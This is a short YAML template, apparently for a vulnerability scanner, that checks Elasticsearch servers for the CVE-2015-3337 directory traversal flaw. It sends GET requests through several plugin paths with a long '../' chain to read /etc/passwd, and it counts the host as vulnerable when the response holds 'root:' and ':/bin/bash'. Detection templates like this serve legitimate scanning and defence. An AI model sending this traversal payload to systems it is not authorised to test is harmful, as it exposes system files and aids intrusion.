id: elasctic-lfi-cve-2015-3337
info:
  name: Elasctic Search LFI CVE-2015-3337
  risk: High

params:
  - root: "{{.BaseURL}}"

replicate:
  ports: '9200'
  prefixes: 'api'

variables:
  - plug: |
      head
      test
      kopf
      HQ
      marvel
      bigdesk

requests:
  - method: GET
    url: >-
      {{.root}}/_plugin/{{.plug}}/../../../../../../../../../../../../../../../../etc/passwd
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "root:") && StringSearch("response", ":/bin/bash")

reference:
  - link: https://www.exploit-db.com/exploits/37054
